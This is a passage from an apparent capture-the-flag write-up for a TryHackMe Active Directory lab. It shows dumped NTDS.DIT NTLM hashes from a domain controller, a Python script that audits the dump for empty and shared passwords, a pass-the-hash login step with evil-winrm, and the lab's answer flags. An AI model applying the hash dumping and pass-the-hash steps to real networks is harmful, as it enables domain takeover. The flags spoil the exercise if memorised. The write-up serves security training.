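[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:4355622f195fd8ee38886a202c50e763:::
[*] Kerberos keys grabbed
"""

# account:rid:lmhash:nthash:::  (the "[*]" status lines do not match)
LINE_RE = re.compile(
    r"^(?P<acct>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text: str) -> list[dict]:
    """Return one record per credential line; status lines and blanks are skipped."""
    records = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            records.append({"acct": m.group("acct"), "rid": int(m.group("rid")),
                            "lm": m.group("lm"), "nt": m.group("nt")})
    return records


def audit(text: str) -> dict:
    """Flag empty passwords, stored LM hashes, and NT hashes shared by several accounts."""
    findings = {"empty_password": [], "lm_hash_present": [], "shared_nt_hash": {}}
    by_nt = defaultdict(list)
    for r in parse_dump(text):
        if r["nt"] == EMPTY_NT_HASH:
            findings["empty_password"].append(r["acct"])
        if r["lm"] != EMPTY_LM_HASH:
            findings["lm_hash_present"].append(r["acct"])
        by_nt[r["nt"]].append(r["acct"])
    # Same NT hash == same password: one leaked hash opens every account in the group.
    findings["shared_nt_hash"] = {h: accts for h, accts in by_nt.items() if len(accts) > 1}
    return findings


if __name__ == "__main__":
    for key, value in audit(DUMP).items():
        print(f"{key}: {value}")
```

On this sample the audit reports Guest with an empty password, no LM hashes, and two shared-password groups: Administrator with a-spooks, and skidy with breakerofthings. The first group is the one that matters for the next step, since the a-spooks hash is also the Administrator hash.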

Using a tool called Evil-WinRM what option will allow us to use a hash?

  • -H

Log in as Administrator using the Administrator's password hash; the evil-winrm argument for supplying a hash is -H, which can be found with --help.

Flag Submission Panel

Using the credentials obtained during enumeration, exploitation and privilege escalation, we can collect every user's flag.

svc-admin

  • TryHackMe{K3rb3r0s_Pr3_4uth}

backup

  • TryHackMe{B4ckM3UpSc0tty!}

Administrator

  • TryHackMe{4ctiveD1rectoryM4st3r}